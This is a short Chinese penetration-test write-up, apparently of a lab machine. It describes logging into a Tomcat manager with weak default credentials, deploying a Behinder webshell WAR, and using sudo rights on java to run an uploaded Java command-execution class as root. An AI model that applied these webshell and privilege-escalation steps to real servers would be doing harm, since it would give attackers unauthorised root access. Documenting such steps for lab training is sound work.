Nmap 進行端口掃描:存在22和8080端口
訪問8080端口,Tomcat管理界面,嘗試弱口令以及幽靈貓ajp漏洞。
(幽靈貓不再版本範圍之內)
tomcat:tomcat弱口令:
生成冰蠍的war包:jar cvf shell.war .\shell.jsp
直接訪問報錯500,通過冰蠍成功訪問:
啓用虛擬命令行,發現java具有sudo權限:(手殘把sudoers文件權限改了,再也並不能執行sudo命令了)
之後上傳java代碼,執行系統命令:
import java.io.BufferedReader;
import java.io.Closeable;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.*;
import java.util.StringTokenizer;
public class ProcessUtils {
private final static String DEFAULT_CHARSET_NAME = "UTF-8";
public static Result run(String commend) {
return run(commend, DEFAULT_CHARSET_NAME);
}
public static Result run(String commend, String charsetName) {
StringTokenizer st = new StringTokenizer(commend);
String[] commendArray = new String[st.countTokens()];
for (int i = 0; st.hasMoreTokens(); i++) {
commendArray[i] = st.nextToken();
}
return run(Arrays.asList(commendArray), charsetName);
}
public static Result run(List<String> commend) {
return run(commend, DEFAULT_CHARSET_NAME);
}
public static Result run(List<String> commend, String charsetName) {
Result result = new Result();
InputStream is = null;
try {
Process process = new ProcessBuilder(commend).redirectErrorStream(true).start();
is = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is, charsetName));
StringBuilder data = new StringBuilder();
String line;
while ((line = reader.readLine()) != null) {
data.append(line).append(System.lineSeparator());
System.out.println("\033[0;35m" + line + "\033[0m");
}
result.code = process.waitFor();
result.data = data.toString().trim();
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
closeStreamQuietly(is);
}
return result;
}
private static void closeStreamQuietly(Closeable stream) {
try {
if (stream != null) {
stream.close();
}
} catch (IOException e) {
// ignore
}
}
public static class Result {
public int code;
public String data;
}
public static void main(String[] args) {
Result r = ProcessUtils.run(Arrays.asList(args));
System.out.println("code:" + r.code + "\ndata:" + r.data);
}
}
在windows編譯後上傳到服務器:
之後通過sudo運行java執行代碼,便可以獲得root權限: